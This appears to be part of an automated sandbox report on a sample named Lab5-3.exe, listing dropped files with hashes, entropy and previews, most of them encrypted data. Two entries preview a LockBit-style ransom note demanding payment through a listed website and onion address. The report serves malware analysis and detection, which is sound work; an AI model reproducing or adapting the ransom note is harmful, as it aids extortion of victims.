                                                                                                          Preview:.i..z..'......]..L~-..P.!......G..5...P.h...f8.6Nu....+.5...c)W2.-%B..!..I7...........p/.....t.MqC..I.8...)...k.......f,c..5$....U.[..*....#d......=bV...GU.C?{..c.c..j#..0HR=....9DMO{V..#.=x.YT..p..(.....U.O,..1s=)...)...g.v}.....5.$.I..IO.B.............{.05O.b..........y..J..,..?[.....2.......>s..8.-a.b.h.3.(z.Z.v+.G..r.....8..Z.v.;4...DN=.....3p...s..$. .&....<.%..7.....Q..?.]...u-..e}.O..w.C.i...3...+.Q...cG..q.m..~...L.....GBY.A..."V..3..H..+9....].>Yt..W...^,K...._.m..._..$O......<..0t....E..#X....<_z'n.[.l;....Xh..`...].....6..w,..38+.,...>vE..w.....|.T}.5e....k.....L.A..eX.-$....b.].....3\.\...t......E......)0..)+/. C...0n.......B|z.T....D..9...f...S.8'.{....O|..g.'5.E....+d....._...~....oO.kV..)f.r.7bO..7B....2.]........c$...`D..Z.\.o..C..pB..q.`..>.|.....K........l.....Q.v....QF$..(.[.~.'.r.:?..!..De.....G...oF.5.<y.F=4....Y....v.i..'.M.4.F.H..f\..^.V...=!Q.w..x..7..9.y...o'b...J...&X,4.{..@..y}.<U.m....=....[.A4r.Fb..#KD..2.1..Jn..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3200
                                                                                                          Entropy (8bit):7.941355982459871
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3My1j7iF94BdwN2Sf6MP6SLR9UEOpmMkDVHfUTid3hBaUoSGFcmeykEdEElU92i:ciOF94BdwnkSnUEOpmDuGx0uKeY2ElUJ
                                                                                                          MD5:A97CC1DC66F93667FD258F8EC3904BD2
                                                                                                          SHA1:17F8D24CA621FC82ADB2CFA30DB8092819867074
                                                                                                          SHA-256:AF76667ADF64143A427DA068017BFAED5570139A45AD705BFD7F21B4FD889A43
                                                                                                          SHA-512:A8F505C93D65C7C8A3F646A63D39CEB44DCDBA6FA06106DE4C2828987E3DB690BD9CC8AB20EF7C5AE8F943C0FAD29EF46E3092CC86EA2FA29AA5426B114FAD27
                                                                                                          Malicious:false
                                                                                                          Preview:..Bo..b.....i....Me.Ok...........m..TF...u.....\X.?...CN.j..q.b....z.S.....s{:!.CtU'./...K...&h8......cD...P.o..o..h...S......5..,$..,.>."'.........(..%...$...Z.\....o.........U..q.B....r.t.y.........Y..*..D.f^.....,O .....DK5].EreRY.Im4.c..|.Y,.'..!. ......x%....DG(......).'.xV...o..C.....7...@.F.h....i].+..1...;...n...r..D45]\...&.U...a....}....=l..^..=.O....a.-..\..o...c...."...^..C......h.E...|.6W)-.D*tZ..+.M.<...@v.........H.'c.5<d.r.!.i>.gL._.....YJ..A.].*....`.. Y.....<z.....Bq..q.I...kf.l.9Q..z6,.L+r3-..;..u..W.'...o_.)...(..\..Gb.".e.e...........Q=B.U..`.S(x...R......2T..5.,..+...|.V..T..c..Ld.2..a..-<....x.:.g..V.FU...]?.u..=......KQ,).p..pZ..i.x........T.Fo...7..m.h...m....sH..(g.f.h.[..f.e.=..s.2.)4.W...&.2m....H...v..[|.....n.un..b 1nT.6..V....@..._u....%...J).aG...>..?x.5....F.{$q..*.%3..}.....%....=.5.....J...-a..<.@k.V.~.W.$bi..G..(...h.TTP...8Y....xN....i.X.K....M..\......=...,...4..ew-(a..c..g.-.......n93.K*..i.U.0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2896
                                                                                                          Entropy (8bit):7.943450730392504
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kCvU7lJ8hJ1z1tQm76KPRFaD8W7f3C9ndVGuQSImwHfUTid3hBaUoSGFcmeykEdM:3vU7lJ8h/z1h3fat3qdVdQxoGx0uKeYO
                                                                                                          MD5:2E7D401C6B7074C828CDE689D673A6FA
                                                                                                          SHA1:4B63ED9FE6DA625182D626A9C70EF0AF923841F5
                                                                                                          SHA-256:56465F834BEC8562F6A0AB2A718845E32A3C19C58FCC0AC162D4E1A572B80412
                                                                                                          SHA-512:BD60C4559AA673410A75DD0B42BAADF02238BC94E7CDF1BEB22EBF8F6B89ED90D478B4C0420EE214A5B12B8123AC46966E130625F5F947EAE4D892CBAD1A5679
                                                                                                          Malicious:false
                                                                                                          Preview:....#)..O...J.A...]Sy..1......G.x..(H.v.}d..;....b@.{iL.0...#...p6{e..j.<..m.-.x..`......./..F.Y.P...u_.!.n...x`.$..e.j#.u.: I6H..[..`.r.;?0..:........Se......M......./.1.3.......o.Q.n.....F.5...fO...<.}.d.........n.8.:Z.........kL..I.&..<...L...!..../..h.(.@...........s.)"....v.O....uR..D.RD.... ..2...a..N.m9.H.=...I......8A.g._.(]-(H..B...r.......Ie...FV.-L..eB.DJ.-.U'k..........CZ....l....._@...(%..J.0:ADa.F.&.H..1&d.8.;z.pIF.{.D.{.....m..Vg.[kh..&&L.d...h.+..|D.3X...9..a..X.....o....#.....S..C...E...../.5t..>...hs.7..4.....Mb......sH..U.l....?.}.6..`{.S.W.E)._.]`?...:......@^............N^.~.*.5...?.......{U4.......k_!.....g.JeiG.!...].T.gE...I..%@.{..........<.t..y.~4@n..bw8?.D'.|S.re.6...Y.(X..z<.[*y.......S@..o.q.G...4.k....../..E..(f....E..g.........].i....d..;t...#.w.I.....0b?.BGz??.W.u...J.=...HNh..n!]...;.L...#..?..$..u.kM.u*.;n....*...N.]...uw.....9-x.........1ZZ..j7W)..4......B.......,.n........E...@.D.....j.....N.Cpp.c.Q.(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1648
                                                                                                          Entropy (8bit):7.886046467504578
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DTC+wYGpHfUTid3hBaUoSGFcmeykEdEElU92i:ZwYGqGx0uKeY2ElUJ
                                                                                                          MD5:A95AE1169B2A066D640DFBDAA66DD8AC
                                                                                                          SHA1:4454317C38106F1BB5B84E0EB0BC29D5D622CC0D
                                                                                                          SHA-256:F11EC04DF598539F04AFA2F0F1F87ABE5AF90F1D356E3D8F2507C0148F520B92
                                                                                                          SHA-512:22F0C8DDD086AD3C7D154889A27507C921F3BF94609F6F54DFC0DE3AEA62035E282B53FA4B33B17965F391EED6C26ACCABEDA93D098C22C5B4C6B4744703E3C4
                                                                                                          Malicious:false
                                                                                                          Preview:.9...^.F]iWD+.k.r.Jd..!!.7...}........!...e;....F+)...F........<..=Q.97.W5q....|.]58x..C..#.q~TB.M.....0...[8..J..u..S..).#..T$.K.!...-IRR6..N_9....Hl...pT.!..b@.g..H.O...4....\j.]......c.#..E.`..>.f.?>XY..r.r...h[.X.H.5c.S....4..(... .u..2...S._......c...~.;..c..f(^..o.Q...;.%.`~G.P..5...:8.....8..'..<7.!.. .^......S.[...fc..x...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1648
                                                                                                          Entropy (8bit):7.895468926827035
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TclMrpbHfUTid3hBaUoSGFcmeykEdEElU92i:TBoGx0uKeY2ElUJ
                                                                                                          MD5:05F34A2DE988AA50DCA510DF18F9F4F2
                                                                                                          SHA1:477FA3360E2EFC6483BC7C6AFA44EAEFE2A7B3AA
                                                                                                          SHA-256:0D3DE9CF75598CDA0D244AD36DC87CC111805851EB1CD95E7CE8A4175F23C839
                                                                                                          SHA-512:E34A78133BA8C3FEFE740FEB0FFCB3FA22B660ADF78DBDCB57DB63DCEC8FC6906B6A9D5498653C7D5CDC458D0CD644B8B9529F8FFC9386D879895D119AEE9EF9
                                                                                                          Malicious:false
                                                                                                          Preview:x.6..uT@.f..q^1..dt.r.k..N...."3....T.</......w.0.,5ZR..^V..:...'7a.e...dCu..r.&o.1....d..g.../..>.Y~j\ ...nc@./...|b.<.+gD1.......(2C`....qX.9....2..k...O....-..%...Hl...v.s.M..Yk..5`.D L.......g\9.....k.\.........e.0.oO..rZ...0..$...lq....%.....q.+'.v..kd<Lh..SkJ...6b..&.l.b`Fl.....Y.-C.>r....W..|7l9.C1U..KqeA..;...9O.....LH..,.i.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2352
                                                                                                          Entropy (8bit):7.920489611569427
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:iY5DN3nWX6GqFXdyk8fpDosHfUTid3hBaUoSGFcmeykEdEElU92i:JN306pFXM7xDorGx0uKeY2ElUJ
                                                                                                          MD5:40BA3DC502947CFA4B0BDEC72E479B34
                                                                                                          SHA1:485B4606223C0B46AEB38868ECD4CAE68C0EAA3D
                                                                                                          SHA-256:E5718E0B14AD320EB6CF33E9A68C2C9E1C9593425BB173D44CAA708EE99299BD
                                                                                                          SHA-512:F819CEB9535F8EBCE8C3DA8B620DAE220C56742C0AEB2FA43006FE8BF03FDEAB276AED653F70EFC2390F53B182D43BAC9C1231D2B3AE42DD986BD3881822E549
                                                                                                          Malicious:false
                                                                                                          Preview:.....Q-..l..V..."...!..G..2._...>..PA.....;....\...._~ .'%.p.R..d]....kR.. .a3.)..H.7.m&...<.Y,...Cvl....|....V.n.....lJ.....o..b......d...xh..hr^..4}<.M.)...(ry.o.(.@!..g`I1.....kiKY...ZW.=.F...^..`....."..w..F./$......q.g.f...4q7...<.KD...[..j...i.l.y:1..L.j..\g.......^.c.E..>..}*.Y5%?.9.F.g....2....!.W&.5...$.t..Qm...m~7.G.q[#:..9..K../..t..+...Ai.e_.V..6...+.4.<..t.X..WP.W..Z.......b....-..,.(.Y.,L."....I.#V...`V.d.~Xm.2|..U;R..x...b...=%..<.G.u........<...GNE<.r....{..x.#.K?Z&.%u.e-...A.\.3...?P....Qm.....[....M.....z.....;)..;......X).k..~....e2u_./n.....t7...].....>..6..93e<........T.T.$,....L].u.eC4.# ......n..#.O.#.....#.(.R.4.Ey..j.T.O."n...9.=...."u,.g.{...v^8tA...l.....0=^.E..A.`......_....^..w..8.l.v.<....*.....;.>}.v..a...5[....'..{...!.<.8t].V.Z3........54.....*a....<.I.|BL.....\hyo.......#7A. .....\.u.c...5..9..`[..7.j......x...y..-...?.s...YULm.lG-K....B3.N.;...j...e....evR.I.u1>L[..X......5.9....n...[.v.+.|&+.i...<:-
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.934922764195229
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:aDrdn4jeoa9nK17YOrxHYtMT9cNRq9ZssHfUTid3hBaUoSGFcmeykEdEElU92i:aD94je7K1RN4t8c2srGx0uKeY2ElUJ
                                                                                                          MD5:22BE46FDF410899746131C1471F5C2EE
                                                                                                          SHA1:E5563DC024967C7876446293E82592EF56CA39EC
                                                                                                          SHA-256:665BA6E6B694C6DD37B919B63EA6AF1C35262120BD9268BD74BCD4D918AD294D
                                                                                                          SHA-512:681ED19AB37AB4FF276828885663BC23E37E6686BEC0F3CD934F9E58C0CA5CD784B33A83C129772076636FA32CA34613AF3D48FBE220760F2D9EC0BC45273223
                                                                                                          Malicious:false
                                                                                                          Preview:.y.gY....=....:...S....h*e..~.....T+m........\uL.._......~T......M.G^*.s....dK......b....!.7......Z.W2....H ....%\.!`.6....R.K.OxfL.z..`..A<.W.......,B>.;.....;.ZK......78E.!~w=.vo....B;"...7....6.e{.."_...P..e.q....bZ. ./n...>.h.y?%.R..yE..js.........~.#.....Dw4XJ.......*#[nW.B...*........&yO.w.(\.<'CP.....I.M.h.XAxAg.S.4..H.......{...>..$.eV.<).......}U.....&...!..C.T.9..D6?<.X.(%J....N..ha...(........b.0......@..%..$.@.i.A.!.]A.UP.2...f(......|.......".oK.W..6,..\....D..,.PV...z.... m...c..</..4.R+b..^.,}....2..!..h....f0].B1+..i..Y.5.....B.J.}...x.#].L...)...!M.#m.:.~i. .V..VAy.3..6...4..*7;.WD.....}.....5.j.26..*.t....$.@.W :.&....P}.z....K.~...;%...A...........sv3.....s.r.l5..p...-P...W.z....l.0....>".....E|C.{"C..1..X..xy..>..j#.|....U..0..jPKC.rq:x-9.r1....!M>......6{OI.n....R@..E.E...K5.rH...2....G.{b...r2%..D.........\.....v....E.H.....v...5+.]\......v|.r..J.I.......hXy...|....4z.~.L#r98.....q..O.xA...].C..~.....O.7h,].>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.9261558999808
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tBDqF3/8PhGeVr0NOa6ybkF2Rux+IdHfUTid3hBaUoSGFcmeykEdEElU92i:tB2F0PhAz6JFcK+tGx0uKeY2ElUJ
                                                                                                          MD5:F5FA994501D6690C9E2F0595179CD3B5
                                                                                                          SHA1:5B6CA84CACF4B69DD2F26E6B66A60047E85EE617
                                                                                                          SHA-256:36E203C631B7BBA713B73B057018929D7DB7CA87EA0EAE2F78DB7080AD1B45B5
                                                                                                          SHA-512:E04926D3C3AFCC353456F9024172A85EB17D532B56AAC85F65830CA6E8D2DA1DA4010B0D0084DE0B7E57CF0D18C04142B00C4617BB3CA48E5AB0F56B445F0F35
                                                                                                          Malicious:false
                                                                                                          Preview:^f..'.{.xv......=+...0#v.KT.V.....|r./....1I3k.h... a/....*{.dN'.5bAy.....KVOW......W;.."..]...2..>.7!s..=..2u...$.c.C..d....6..\..1....zNrU.@..&C\N?cJ~.)..L..-4iX...x..,|.3..{..4,s.m.TW..O....-Z.1{.zlP.....C\..'.d@As.f5&3..R.0.A..nP<7)J.W.....CR7..?vSE...5..d....^...>.8....y8....$.C..tL{-.o!.mK.|.O.3_.... .7.2O.v%.1....l...........ka....G.Y.R..3.h.f......(...)..%Sv.;C@<lt{.H...$......>..HA...p....J..2%!.......}..|X.F...5.BQ.[7...j.#.....9.x.r.........cm......ta.Y.4/.....$#......_:. ....wM."....z..rM."b.E....N..........,......;.s...pd...?)..L.`jr....s...8..i\.....-)I...B`.@.>.........,fp..Lt2j..-s...V.W?s.....U.....A+..X....j."Q[.B.<.8..N.:s..Mv.apA..F.....Ya*.".c4?.Y.E..cY...wl..Z.L.=...c.G.4...F.'....cw.R.RfN..[a...k..k0..*.V.P.Eeai`.}.A.No.u?+.W.......8..R..jF:...$*.(nc...M3.n..pdYg.c.m3.!....0.2.1.!.........W........~..K^.h!....TToi...,>.".'.;w.o.......i..s.Cb]..+..0{..f)&@...$ ...Y...+7u..C....7......D......+-..T.+.G...s..Lg...u.7.K..q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3008
                                                                                                          Entropy (8bit):7.940057200232779
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eQ4RvMlfhhyh+mj2cNSZHfUTid3hBaUoSGFcmeykEdEElU92i:9QvGfy6cDGx0uKeY2ElUJ
                                                                                                          MD5:94B0D76E7644802E6E3E3900960F1670
                                                                                                          SHA1:265D3777A9476CC1FCEBF5107189CD54DE34A545
                                                                                                          SHA-256:7BC96B9D73165E2DF1CCE0656C6ED92777AC03DD0CEDA7EA7202F6A726B64BA6
                                                                                                          SHA-512:DF6BB5F00DB140F6B44606EF458EA12D5D04EBE89D5C4642FDE0AB70C4853DF2F5916F6D107FC4A904D25DA043B928A07A1F494DE1774725958578951D1E3A6E
                                                                                                          Malicious:false
                                                                                                          Preview:/^.ia..n....8..T.$..6..?r..1..'.1>.....Q...m.y.J...v..;.`f.9.-....V..S.gW...Ch..o....|..[.n.>.....l.^d.'.Y.Q...p.b..]kRnO.S...a..W#3.NE....%0.(..^..-. .~....iyr..)......b.!['3H.;...6..N.4'.a,.....4..\.....G3.x2KN.d..6.......D..A0...~.P.../U)SH.h%..Z)(.m7..$k.P..;-.cL.>+a.....OEl*.T.J...=%.O.........T.....$..C..P........'.d....*..5.....UH*.S+q":..e......:gu.....!.*Be.......P.z.!..7\..Y.$....'.xF.rA...i...VX...k$..mI................{..2...-.3.G..4...t|....t~L/.q...7...Z..V....w..1'`.(....W..9E.7.vZ?Cc{p.;giqd...e..W........T.9.b.....6,....P{.....$..&..y..Q_.{..P {I.[..T.n.....{....V"..7T...c4#.{....I.p.M..`:c...o..}OPON\..V.O9)ly..x.....qG.&.H%M....W0..U.O:.!"4.v...-.P.u..a#.C..u...7.u<......B.$..C..M.=..y.;..w.F....>L.i]........}.@._7.l,..r.W....}..G...N...A.#V.."c.0.M....&O........L.o....B...'A..N..!...W\9.....&.S,......|...6..Q..U......MT..\C......#.L....N..mWPSB.......D.v+W.H.:.m.......'8.w........h..?...lG1f.*&.(.!9.(....).U...F.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.934093551265204
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8IMSmUw3XYuiXLLaOaJIoj4pB35ctv/F7m/Y1HfUTid3hBaUoSGFcmeykEdEElUJ:8IFzwH+X3ODs35cB0wOGx0uKeY2ElUJ
                                                                                                          MD5:5E3FFC1CE640D818BDBCF665FB3F11D7
                                                                                                          SHA1:611A344107EA57F7735583181833F267F5224FA7
                                                                                                          SHA-256:A9F5EE6B22C75B523EC3CA27E721C3C6FB3A82D90F031BE5CBDB783056716A45
                                                                                                          SHA-512:E7DB7AE8A58EF35546459A34725AE5DF0224027DC2504A657881A667005BD8F77CFF64DE54C52FD9E7EEF6340EC5004CC09CBCC7DA1866EEC469176CEF4C3980
                                                                                                          Malicious:false
                                                                                                          Preview:....l.....r}2v.E.4.5..v.5q^).}(..8o.f.R.A.z.j..........!...'.$.....&&Q.....9V._.."....k.....Y..s..@..Oa....L..II#.:..^.<.....`..Kb}......:..r..,. ...j..2A..)..)Ei...%.T.oy..6..39J.!]....U.7..s...{@.BQ....Hy....{.8%+.{.M6.......B.r..E..:.g.....M.Nyl...R.....T...T .7...4..i5........r/.:;..;J4.v..~.(.tL...UL}(..N.w.....y.....: ..]C..g..43.......)5y!.pdsr........I....z.NExN.V..V.%D......Hp.0H....C..-..=8..N.R$..\..T...]f...Z.*...[}..H....C.'.4......0n.`.....|d.n?......Z$.......:.H..z.....H.|...1.)M.b...v..W.8.z,.`..wM..^:a.s.W...t.v.....^m..0.[.H.z.x{VOM`.|......T.2;.u..X..y=+...x6,...i.wb.V....$E.=........r5..l.....i...N...k...f.b.4.w.G..?.7EY.'t.:.........s.@.0...Y,:..ETt..."..`:U...[....7<!.n[*........U.l..iU..3..-...('..c.z.=.......K...e..2P........oj..?...f...<0_....q.......AT..s.W.a...E.F.4...=q..=[k_(.......H..=.N../'.EU.gx.\f.R.#.B>..|...S..5F.s.......S.;.lO.~.s...o.L.1/....x..a.....j......4.......s.s.ohQ..*."..ox...".Km...b3.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.930578998018599
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IInx4TOGCM0LenmSA4zZaDwrUVT/w7c4jHfUTid3hBaUoSGFcmeykEdEElU92i:hnx4TOYaKZaDlwcPGx0uKeY2ElUJ
                                                                                                          MD5:75E340FA842676051DA26FFB29B6C28A
                                                                                                          SHA1:FA10BDB8A5DD795F2BF80783F90D75641C081F0A
                                                                                                          SHA-256:7BCBDA5EEA7143C8A8DC6484BE0152835F19A5AE04496920250E38E471AE8E57
                                                                                                          SHA-512:429A9C895EDD4C12BB2EC3F939C99EA35478A9FD1ABE4FB8D0CC105A7025B7663C2A818CA0A2C1A66BBED5D5E369B0FA56595B310D73E7FD6ADCDD8A219DBC95
                                                                                                          Malicious:false
                                                                                                          Preview:...N.....i:`..s....{...#...H..g2aE}....).R.l.M\.\Ir$..y.....H.}3.T\.....6.N.......\L#.}....+.......g.).*.4...N.hT]C.[8.A..4@...Q.h....6X..d[7..../_........(u....d.:~m...$..S........*U..(....s.....FM..+&6..?l.8...9.F..M1.\V.G...._..n.q....'V.k..5..c...^w.=...mT...6_...-.h.!/.g..t........!..:...nZ...=........{....L..?..K.|XH..$.............[...D....^.p8K8t..Kd.'H.tJ..T0...LnE.....,)....9....j$>Z.....G..2..').,....M*...P.v...B..K...1.I...............J[..c..D-Lf.]......4?.l.Oq.kNG..h.q..5.......9\......KzQUH.%,)...Lgm....#...E<.U.......L..-....$c..H.K....b...%k....Y..Z..K....5.|..p.......j....Fw...F.....{<....4&...V.e.4.L.....m.5..:h.f.......8V26.J...=.0....BH.4?r..;.XK.u.Q.qZy8.....CV....4j...}......o..)Q...M.^A"K.....-(.. .P..q.l.P.t...L......U&8/d.:.y.jx.6,..w............Ai#T.{....NI..Y3.,.Y............^.O..;:.c...^.................%...>..0.$7..d......~..+}.@.7..tI......".-&..n>.i.:.x..,..;.......3.9....jW.z.1.r.%.tY#..Mp...fm....4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.926855053881584
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Knf6kQ2LiSRsXBOkMt/3HfUTid3hBaUoSGFcmeykEdEElU92i:Kf6GqROp/cGx0uKeY2ElUJ
                                                                                                          MD5:2335828802F8597428C7278539DB24C6
                                                                                                          SHA1:2C9D089872BFE6584FB2D9B8D7B1AE0D0B81C197
                                                                                                          SHA-256:CA2482D4D3ED3BF40BB0646879A6D2A95A6018FAAE45D1931D7B4C57FF5EC128
                                                                                                          SHA-512:B06EA119DE6F2AA236DF5DE64485B502F04692CAD9A4355F273FF2311A0807DA5F745073CD62C08C7ECA376C132D4E1E406085A22EC34EEB923147E0897EFA2C
                                                                                                          Malicious:false
                                                                                                          Preview:z.p.....q"...Y.S.?....k.9?.b..H.$L..{Y......x,$...ty).*%<..Pz.......l....D....S.....0.)@(b/.,.3o....[...._...#.r.>)|.9.b....l.7o.4C..U.h..-.......]......M..g.....).sU.7.....wJ....L'.m.S,......QM.k.z:.u.@%.D1...UZ{a..`..4.Z/h9.O.......A......4...!...(yu..o....[...d.QU@.$.p.h.@.....?n.GS3.P...>p9.....9...|..,Uj......}.>.........^.6h%...o.....tx.XL.V.z..#NB.$..]ypU.k..L.!.jm..}......1&..l.G.....0...4!..AUv.p.a...j.%....D....e:...(5......&.~.uJ.@..+/..V..!iK.O..F.....D +.Mo?.X...:.....o~}....V...2b...Ex..e...g..a ....g....C...S.n..,K......V.....%z.81.I[.*.....6...}....z..%x.g+.HP.W..j.J..i.....T........g.4...T.^F.7....HO.0.61.c2.=.h.Q..{#.....F.b].g.4.....r.T.5`..i..&.z..Mv....9.da<....o...3..(....R..]...|.e7..W_KGa.X..mm=$...5oC.p*0{..V.r.a7>A.%.7U-....q.+..Lc.P...3...&..'.I..t..x)...F.>?.t.]......TN...K..X..:.m..MH..@[vK..kM...E..`..,...#.j..\$...c..1.W....b.../t..'b.f(_.W`.h.Yd........|.5...8............k4....uW|.E@....M.C|.=dw.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.931377043855693
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9/svlGVlgQO1F6xUFyVHfUTid3hBaUoSGFcmeykEdEElU92i:KNsgQIKUxGx0uKeY2ElUJ
                                                                                                          MD5:FE685B948C53B0D6D8D4EC7497C4B937
                                                                                                          SHA1:63905F7D3A500D34BA360A3EEF545E5A48FAFE5A
                                                                                                          SHA-256:1BF5886C5A6A81DB124139C585F3DCB567E0CEC8E2318B3845120D8A9F51D568
                                                                                                          SHA-512:D8AAEE55199FDA280795AA52F859E0F9343AB3ED9ACDEFFA46C7CADF7A9BAD4FC6373EEBBAC8B92681BC76DCE8BBEF85969076B12B8C0F1BC96C9A35FE6ACCCF
                                                                                                          Malicious:false
